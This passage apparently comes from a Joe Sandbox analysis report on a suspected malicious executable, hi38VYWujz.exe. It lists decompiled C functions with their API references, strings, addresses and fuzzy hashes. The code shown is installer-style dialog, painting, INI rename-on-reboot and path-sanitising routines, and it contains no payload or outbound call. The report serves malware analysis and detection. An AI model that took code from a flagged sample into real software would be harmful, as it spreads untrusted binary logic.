					if(( *_t116 & 0x00000020) == 0) {
						goto L27;
					}
					_t108 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
					__eflags = _t108;
					 *_t116 = _t108;
					E00404216(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
					E0040461C();
					goto L13;
				} else {
					_t117 = _a16;
					_t75 =  *(_t117 + 0x30);
					if(_t75 < 0) {
						_t75 =  *( *0x7a79fc - 4 + _t75 * 4);
					}
					_t76 =  *0x7a8a78 + _t75 * 2;
					_t110 =  *_t76 & 0x0000ffff;
					_a8 = _t110;
					_t78 =  &(_t76[1]);
					_a16 = _t78;
					_v16 = _t78;
					_v12 = 0;
					_v8 = E00404342;
					if(_t110 != 2) {
						_v8 = E00404308;
					}
					_push( *((intOrPtr*)(_t117 + 0x34)));
					_push(0x22);
					E004041F4(_a4);
					_push( *((intOrPtr*)(_t117 + 0x38)));
					_push(0x23);
					E004041F4(_a4);
					CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, "true");
					E00404216( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
					_t118 = GetDlgItem(_a4, 0x3e8);
					E00404229(_t118);
					SendMessageW(_t118, 0x45b, "true", 0);
					_t92 =  *( *0x7a8a34 + 0x68);
					if(_t92 < 0) {
						_t92 = GetSysColor( ~_t92);
					}
					SendMessageW(_t118, 0x443, 0, _t92);
					SendMessageW(_t118, 0x445, 0, 0x4010000);
					SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
					 *0x79feec = 0;
					SendMessageW(_t118, 0x449, _a8,  &_v16);
					 *0x79feec = 0;
					return 0;
				}
			}

0x004043a3
0x004044c3
0x004044d0
0x0040452d
0x0040452d
0x00404531
0x004045f7
0x004045fe
0x00404600
0x00404600
0x00404600
0x00404606
0x00404606
0x00404609
0x00000000
0x00404610
0x0040453f
0x00404545
0x00404548
0x0040454f
0x00404551
0x00404558
0x0040455a
0x0040455d
0x00404560
0x00404565
0x0040456b
0x0040456e
0x00404575
0x00404582
0x00404593
0x00404599
0x004045a1
0x004045af
0x004045b5
0x004045b5
0x00404575
0x00404558
0x004045b8
0x004045bf
0x00000000
0x004045c1
0x004045c1
0x004045c8
0x00000000
0x00000000
0x004045ca
0x004045ce
0x004045de
0x004045de
0x004045e0
0x004045e4
0x004045f0
0x004045f0
0x00000000
0x004045f4
0x004045bf
0x004044d8
0x004044db
0x00000000
0x00000000
0x004044e1
0x004044e7
0x00000000
0x00000000
0x004044f2
0x004044f5
0x004044f8
0x00000000
0x00000000
0x0040451f
0x0040451f
0x00404521
0x00404523
0x00404528
0x00000000
0x004043a9
0x004043a9
0x004043ac
0x004043b1
0x004043c2
0x004043c2
0x004043ca
0x004043cd
0x004043d1
0x004043d4
0x004043d8
0x004043db
0x004043de
0x004043e1
0x004043e8
0x004043ea
0x004043ea
0x004043f4
0x00404401
0x0040440b
0x00404410
0x00404413
0x00404418
0x0040442f
0x00404436
0x00404449
0x0040444c
0x00404460
0x00404467
0x0040446c
0x00404471
0x00404471
0x0040447f
0x0040448d
0x0040449f
0x004044a4
0x004044b4
0x004044b6
0x00000000
0x004044bc

APIs

CheckDlgButton.USER32(?,-0000040A,?), ref: 0040442F
GetDlgItem.USER32(?,000003E8), ref: 00404443
SendMessageW.USER32(00000000,0000045B,?,00000000), ref: 00404460
GetSysColor.USER32(?), ref: 00404471
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040447F
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040448D
lstrlenW.KERNEL32(?), ref: 00404492
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040449F
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004044B4
GetDlgItem.USER32(?,0000040A), ref: 0040450D
SendMessageW.USER32(00000000), ref: 00404514
GetDlgItem.USER32(?,000003E8), ref: 0040453F
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404582
LoadCursorW.USER32(00000000,00007F02), ref: 00404590
SetCursor.USER32(00000000), ref: 00404593
LoadCursorW.USER32(00000000,00007F00), ref: 004045AC
SetCursor.USER32(00000000), ref: 004045AF
SendMessageW.USER32(00000111,?,00000000), ref: 004045DE
SendMessageW.USER32(00000010,00000000,00000000), ref: 004045F0

Strings

N, xrefs: 0040452D
Call, xrefs: 0040456E

Memory Dump Source

Source File: 00000006.00000002.45132331372.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.45132294401.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132406736.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007D8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45135016541.00000000007DA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hi38VYWujz.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: Call$N
API String ID: 3103080414-3438112850
Opcode ID: 631cabfc39bdc86844b6c5ef759f4df1482c42644a70fa64dc4549b5ea516eb1
Instruction ID: 51cb052740ae368b0964ded38bc47e0fd82963d20e12a5d8f79ead0afd290bbe
Opcode Fuzzy Hash: 631cabfc39bdc86844b6c5ef759f4df1482c42644a70fa64dc4549b5ea516eb1
Instruction Fuzzy Hash: 636190B1900209BFDB10DF60DD45AAA7B69FB85344F00853AF705B61E0DB7DA951CF98

Uniqueness

Uniqueness Score: -1.00%

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x7a8a34;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, "true");
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextW(_t128, 0x7a7a20, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x7a8a28;
				}
				return DefWindowProcW(_a4, _a8, _a12, _t102);
			}

0x0040100a
0x00401039
0x00401047
0x0040104d
0x00401051
0x0040105b
0x00401061
0x00401064
0x004010f3
0x00401089
0x0040108c
0x004010a6
0x004010bd
0x004010cc
0x004010cf
0x004010d5
0x004010d9
0x004010e4
0x004010ed
0x004010ef
0x004010ef
0x00401100
0x00401105
0x0040110d
0x00401110
0x00401112
0x00401118
0x0040111f
0x00401126
0x00401130
0x00401142
0x00401156
0x00401160
0x00401165
0x00401165
0x00401110
0x0040116e
0x00000000
0x00401178
0x00401010
0x00401013
0x00401015
0x0040101f
0x0040101f
0x00000000

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,?), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,007A7A20,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000006.00000002.45132331372.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.45132294401.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132406736.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007D8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45135016541.00000000007DA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hi38VYWujz.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 218f2c87b148b58c94c6785b51cf5afc075c1faf60bc5df3e6f759b2377d660f
Instruction ID: 0958fbfe94b1809001ec2c76305b3cf500f7264b01c73c256976ee1787a3906e
Opcode Fuzzy Hash: 218f2c87b148b58c94c6785b51cf5afc075c1faf60bc5df3e6f759b2377d660f
Instruction Fuzzy Hash: B1418C71800209AFCF058F95DE459AF7BB9FF45310F00842AF591AA1A0CB38D954DFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00405EAB Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405EAB(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t12;
				long _t24;
				char* _t31;
				int _t37;
				void* _t38;
				intOrPtr* _t39;
				long _t42;
				WCHAR* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t52;
				void* _t53;

				_t38 = __ecx;
				_t44 =  *(_t52 + 0x14);
				 *0x7a55c0 = 0x55004e;
				 *0x7a55c4 = 0x4c;
				if(_t44 == 0) {
					L3:
					_t12 = GetShortPathNameW( *(_t52 + 0x1c), 0x7a5dc0, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						_t37 = wsprintfA(0x7a51c0, "%ls=%ls\r\n", 0x7a55c0, 0x7a5dc0);
						_t53 = _t52 + 0x10;
						E00406281(_t37, 0x400, 0x7a5dc0, 0x7a5dc0,  *((intOrPtr*)( *0x7a8a34 + 0x128)));
						_t12 = E00405D51(0x7a5dc0, 0xc0000000, 4);
						_t48 = _t12;
						 *(_t53 + 0x18) = _t48;
						if(_t48 != 0xffffffff) {
							_t42 = GetFileSize(_t48, 0);
							_t6 = _t37 + 0xa; // 0xa
							_t46 = GlobalAlloc(0x40, _t42 + _t6);
							if(_t46 == 0 || E00405DD4(_t48, _t46, _t42) == 0) {
								L18:
								return CloseHandle(_t48);
							} else {
								if(E00405CB6(_t38, _t46, "[Rename]\r\n") != 0) {
									_t49 = E00405CB6(_t38, _t21 + 0xa, "\n[");
									if(_t49 == 0) {
										_t48 =  *(_t53 + 0x18);
										L16:
										_t24 = _t42;
										L17:
										E00405D0C(_t24 + _t46, 0x7a51c0, _t37);
										SetFilePointer(_t48, 0, 0, 0);
										E00405E03(_t48, _t46, _t42 + _t37);
										GlobalFree(_t46);
										goto L18;
									}
									_t39 = _t46 + _t42;
									_t31 = _t39 + _t37;
									while(_t39 > _t49) {
										 *_t31 =  *_t39;
										_t31 = _t31 - 1;
										_t39 = _t39 - 1;
									}
									_t24 = _t49 - _t46 + 1;
									_t48 =  *(_t53 + 0x18);
									goto L17;
								}
								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
								_t42 = _t42 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E00405D51(_t44, 0, "true"));
					_t12 = GetShortPathNameW(_t44, 0x7a55c0, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						goto L3;
					}
				}
				return _t12;
			}

0x00405eab
0x00405eb4
0x00405ebb
0x00405ec5
0x00405ed9
0x00405f01
0x00405f0c
0x00405f10
0x00405f30
0x00405f37
0x00405f41
0x00405f4e
0x00405f53
0x00405f58
0x00405f5c
0x00405f6b
0x00405f6d
0x00405f7a
0x00405f7e
0x00406019
0x00000000
0x00405f94
0x00405fa1
0x00405fc5
0x00405fc9
0x00405fe8
0x00405fec
0x00405fec
0x00405fee
0x00405ff7
0x00406002
0x0040600d
0x00406013
0x00000000
0x00406013
0x00405fcb
0x00405fce
0x00405fd9
0x00405fd5
0x00405fd7
0x00405fd8
0x00405fd8
0x00405fe0
0x00405fe2
0x00000000
0x00405fe2
0x00405fac
0x00405fb2
0x00000000
0x00405fb2
0x00405f7e
0x00405f5c
0x00405edb
0x00405ee6
0x00405eef
0x00405ef3
0x00000000
0x00000000
0x00405ef3
0x00406024

APIs

CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000000,?,?,00406046,?,?), ref: 00405EE6
GetShortPathNameW.KERNEL32(?,007A55C0,00000400), ref: 00405EEF

Part of subcall function 00405CB6: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405F9F,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CC6
Part of subcall function 00405CB6: lstrlenA.KERNEL32(00000000,?,00000000,00405F9F,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CF8

GetShortPathNameW.KERNEL32(?,007A5DC0,00000400), ref: 00405F0C
wsprintfA.USER32 ref: 00405F2A
GetFileSize.KERNEL32(00000000,00000000,007A5DC0,C0000000,00000004,007A5DC0,?,?,?,?,?), ref: 00405F65
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405F74
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FAC
SetFilePointer.KERNEL32(0040A560,00000000,00000000,00000000,00000000,007A51C0,00000000,-0000000A,0040A560,00000000,[Rename],00000000,00000000,00000000), ref: 00406002
GlobalFree.KERNEL32(00000000), ref: 00406013
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040601A

Part of subcall function 00405D51: GetFileAttributesW.KERNELBASE(?,00402F01,C:\Users\user\Desktop\hi38VYWujz.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D55
Part of subcall function 00405D51: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405D77

Strings

%ls=%ls, xrefs: 00405F20
[Rename], xrefs: 00405F94, 00405FA6

Memory Dump Source

Source File: 00000006.00000002.45132331372.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.45132294401.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132406736.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007D8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45135016541.00000000007DA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hi38VYWujz.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %ls=%ls$[Rename]
API String ID: 2171350718-461813615
Opcode ID: 1f2b66d66530b4cdd3a0434c0d3521a5c22e25164d410e4764023a67e6413042
Instruction ID: 89c32d2153287748ec41ed641a28e9b16702ce233dbd70bd77460b6709aa78c6
Opcode Fuzzy Hash: 1f2b66d66530b4cdd3a0434c0d3521a5c22e25164d410e4764023a67e6413042
Instruction Fuzzy Hash: F8312871601B05BBD220AB619D48F6B3A9CEF85744F14003EFA42F62D2DA7CD8118ABD

Uniqueness

Uniqueness Score: -1.00%

Function 004064F3 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E004064F3(WCHAR* _a4) {
				short _t5;
				short _t7;
				WCHAR* _t19;
				WCHAR* _t20;
				WCHAR* _t21;

				_t20 = _a4;
				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
					_t20 =  &(_t20[4]);
				}
				if( *_t20 != 0 && E00405BA7(_t20) != 0) {
					_t20 =  &(_t20[2]);
				}
				_t5 =  *_t20;
				_t21 = _t20;
				_t19 = _t20;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((short*)(E00405B5D(L"*?|<>/\":", _t5))) == 0) {
							E00405D0C(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
							_t19 = CharNextW(_t19);
						}
						_t20 = CharNextW(_t20);
						_t5 =  *_t20;
					} while (_t5 != 0);
				}
				 *_t19 =  *_t19 & 0x00000000;
				while(1) {
					_push(_t19);
					_push(_t21);
					_t19 = CharPrevW();
					_t7 =  *_t19;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t19 =  *_t19 & 0x00000000;
					if(_t21 < _t19) {
						continue;
					}
					break;
				}
				return _t7;
			}

0x004064f5
0x004064fe
0x00406515
0x00406515
0x0040651c
0x00406528
0x00406528
0x0040652b
0x0040652e
0x00406533
0x00406535
0x0040653e
0x00406542
0x0040655f
0x00406567
0x00406567
0x0040656c
0x0040656e
0x00406571
0x00406576
0x00406577
0x0040657b
0x0040657b
0x0040657c
0x00406583
0x00406585
0x0040658c
0x00000000
0x00000000
0x00406594
0x0040659a
0x00000000
0x00000000
0x00000000
0x0040659a
0x0040659f

APIs

CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\hi38VYWujz.exe",0040332B,C:\Users\user\AppData\Local\Temp\,75ED3420,0040359C,?,00000006,00000008,0000000A), ref: 00406556
CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406565
CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\hi38VYWujz.exe",0040332B,C:\Users\user\AppData\Local\Temp\,75ED3420,0040359C,?,00000006,00000008,0000000A), ref: 0040656A
CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\hi38VYWujz.exe",0040332B,C:\Users\user\AppData\Local\Temp\,75ED3420,0040359C,?,00000006,00000008,0000000A), ref: 0040657D

Strings

"C:\Users\user\Desktop\hi38VYWujz.exe", xrefs: 004064F3
C:\Users\user\AppData\Local\Temp\, xrefs: 004064F4, 004064F9
*?|<>/":, xrefs: 00406545

Memory Dump Source

Source File: 00000006.00000002.45132331372.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.45132294401.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132406736.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007D8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45135016541.00000000007DA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hi38VYWujz.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\hi38VYWujz.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-708174711
Opcode ID: dac06de1e1615827748cce9690c43cbd9586789469f0d882438918906e4257c7
Instruction ID: b8c3cbf5b75eb2b2499c9cde9ef872d51aef5c2750dc7b0313243111e00abff4
Opcode Fuzzy Hash: dac06de1e1615827748cce9690c43cbd9586789469f0d882438918906e4257c7
Instruction Fuzzy Hash: 9B11C85580021275DB303B14BC40ABBA6F8EF59754F52403FE985732C8E77C5C9286BD

Uniqueness

Uniqueness Score: -1.00%

Function 0040425B Relevance: 12.1, APIs: 8, Instructions: 61
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040425B(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t35;
				long _t37;
				void* _t40;
				long* _t49;

				if(_a4 + 0xfffffecd > 5) {
					L15:
					return 0;
				}
				_t49 = GetWindowLongW(_a12, 0xffffffeb);
				if(_t49 == 0) {
					goto L15;
				}
				_t35 =  *_t49;
				if((_t49[5] & 0x00000002) != 0) {
					_t35 = GetSysColor(_t35);
				}
				if((_t49[5] & 0x00000001) != 0) {
					SetTextColor(_a8, _t35);
				}
				SetBkMode(_a8, _t49[4]);
				_t37 = _t49[1];
				_v16.lbColor = _t37;
				if((_t49[5] & 0x00000008) != 0) {
					_t37 = GetSysColor(_t37);
					_v16.lbColor = _t37;
				}
				if((_t49[5] & 0x00000004) != 0) {
					SetBkColor(_a8, _t37);
				}
				if((_t49[5] & 0x00000010) != 0) {
					_v16.lbStyle = _t49[2];
					_t40 = _t49[3];
					if(_t40 != 0) {
						DeleteObject(_t40);
					}
					_t49[3] = CreateBrushIndirect( &_v16);
				}
				return _t49[3];
			}

0x0040426d
0x00404301
0x00000000
0x00404301
0x0040427e
0x00404282
0x00000000
0x00000000
0x00404288
0x00404291
0x00404294
0x00404294
0x0040429a
0x004042a0
0x004042a0
0x004042ac
0x004042b2
0x004042b9
0x004042bc
0x004042bf
0x004042c1
0x004042c1
0x004042c9
0x004042cf
0x004042cf
0x004042d9
0x004042de
0x004042e1
0x004042e6
0x004042e9
0x004042e9
0x004042f9
0x004042f9
0x00000000

APIs

GetWindowLongW.USER32(?,000000EB), ref: 00404278
GetSysColor.USER32(00000000), ref: 00404294
SetTextColor.GDI32(?,00000000), ref: 004042A0
SetBkMode.GDI32(?,?), ref: 004042AC
GetSysColor.USER32(?), ref: 004042BF
SetBkColor.GDI32(?,?), ref: 004042CF
DeleteObject.GDI32(?), ref: 004042E9
CreateBrushIndirect.GDI32(?), ref: 004042F3

Memory Dump Source

Source File: 00000006.00000002.45132331372.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.45132294401.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132406736.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007D8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45135016541.00000000007DA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hi38VYWujz.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: d93bb5df8f2b76ccefaad0a5d1bb7d3eec77da1dbbaa67d130298efb7d8eee66
Instruction ID: 89996262c0d64ac0fda19422125f93b67266a0f1ca122a9c1e6306c3a20023a3
Opcode Fuzzy Hash: d93bb5df8f2b76ccefaad0a5d1bb7d3eec77da1dbbaa67d130298efb7d8eee66
Instruction Fuzzy Hash: 34219271500704ABCB209F68DE08B4BBBF8AF41714B048A6DFD92A22A0C734D904CB54

Uniqueness

Uniqueness Score: -1.00%

Function 004052C3 Relevance: 10.6, APIs: 7, Instructions: 72
stringwindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004052C3(signed int _a4, WCHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
